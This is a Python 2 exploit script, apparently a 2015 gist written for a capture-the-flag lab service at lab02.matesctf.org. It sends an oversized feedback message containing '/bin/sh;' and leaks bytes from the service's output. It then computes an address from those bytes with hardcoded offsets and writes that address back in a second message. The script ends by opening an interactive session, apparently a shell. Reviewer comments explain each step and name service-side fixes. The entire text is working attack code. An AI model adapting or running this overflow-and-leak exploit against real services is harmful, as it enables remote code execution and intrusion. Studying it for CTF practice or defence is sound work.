@peternguyen93
Created November 29, 2015 05:29
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# Connection object shared by the whole script. `Pwn` is provided by the
# star-import above (the module itself is not part of this page); host and
# port are fixed in the source rather than read from arguments.
p = Pwn(
    mode=1,
    host='lab02.matesctf.org',
    port=4231,
)
# Variant the author left disabled: the same helper with no host/port given.
# p = Pwn(mode=1)
def exploit():
    """Drive the remote menu service through a two-stage feedback exchange.

    Stage 1 submits an oversized feedback message, then captures the
    service's next menu output and extracts the 6 bytes that follow the
    padding. Stage 2 submits a short feedback message that embeds an address
    computed from those bytes, triggers menu option 3 again and hands the
    connection to ``p.io()``.

    Uses the module-level ``p`` object, takes no arguments and returns
    nothing. ``l.index`` raises ValueError when the expected marker is not
    present in the captured output.

    NOTE(review): the meaning of menu options 2, 3 and 4, and the memory
    layout behind the numeric constants, are not visible in this file; they
    belong to the target binary and need to be confirmed against it.
    """
    p.connect()
    # 2064 filler bytes, then the string '/bin/sh;', padded with 'A' up to
    # 2168 bytes in total.
    # NOTE(review): the script depends on the service accepting a feedback
    # length of this size and later printing bytes beyond the stored message;
    # a length bound matching the real buffer and output limited to the
    # stored length would be the service-side fixes. Inferred from this
    # script only -- the service source is not shown.
    payload = 'A'*2064 + '/bin/sh;'
    payload = payload.ljust(2168,'A')
    # Disabled pause left by the author (presumably to attach a debugger).
    # raw_input('Debug>')
    # Menu option 2, then fruit id 1 (presumably selects an item -- confirm).
    p.read_until('>>')
    p.write('2\n')
    p.read_until('Choose fruit id:')
    p.write('1\n')
    # Menu option 4: the service prompts for a feedback size, then content.
    p.read_until('>>')
    p.write('4\n')
    p.read_until('Size of feedback message:')
    p.write(str(len(payload)) + '\n')
    p.read_until('Content:')
    # Sent as-is: exactly len(payload) bytes, no trailing newline appended.
    p.send(payload)
    # Menu option 3; everything up to the next prompt is kept in `l`.
    p.read_until('>>')
    p.write('3\n')
    l = p.read_until('>>')
    # First 'A' followed by a newline in the output (presumably the end of
    # the echoed padding -- confirm). s + 2 skips those two characters.
    s = l.index('A\n')
    # The next 6 bytes are NUL-padded to 8 and decoded with p.unpack
    # (presumably a little-endian 64-bit integer -- confirm against the Pwn
    # helper). The three constants are undocumented fixed offsets; they are
    # presumably tied to one specific build of the target and its libraries.
    addr = p.unpack(l[s + 2:s + 8].ljust(8,'\x00')) - 0xd44 - 6201344 + 0x46640
    # Python 2 print statement: shows the computed address to the operator.
    print hex(addr)
    # Disabled pause left by the author.
    # raw_input('Debug>')
    # Second message: one 'A', the packed address, and a terminating NUL.
    payload = 'A' + p.pack(addr) + '\x00'
    # An empty line is sent before waiting for the prompt again (presumably
    # makes the service reprint its menu -- confirm).
    p.write('\n')
    p.read_until('>>')
    p.write('4\n')
    p.read_until('Size of feedback message:')
    # + 1 accounts for the newline appended to the payload in p.send below.
    p.write(str(len(payload) + 1) + '\n')
    p.read_until('Content:')
    p.send(payload + '\n')
    # Menu option 3 again, this time after the second message is stored.
    p.read_until('>>')
    p.write('3\n')
    # Disabled by the author: read the next prompt and send menu option 5.
    # print p.read_until('>>')
    # p.write('5\n')
    # Hands the connection over to the helper's io() (presumably an
    # interactive session -- confirm against the Pwn helper).
    p.io()
# Runs on import as well as when the file is executed as a script: there is
# no `if __name__ == '__main__'` guard around this call.
exploit()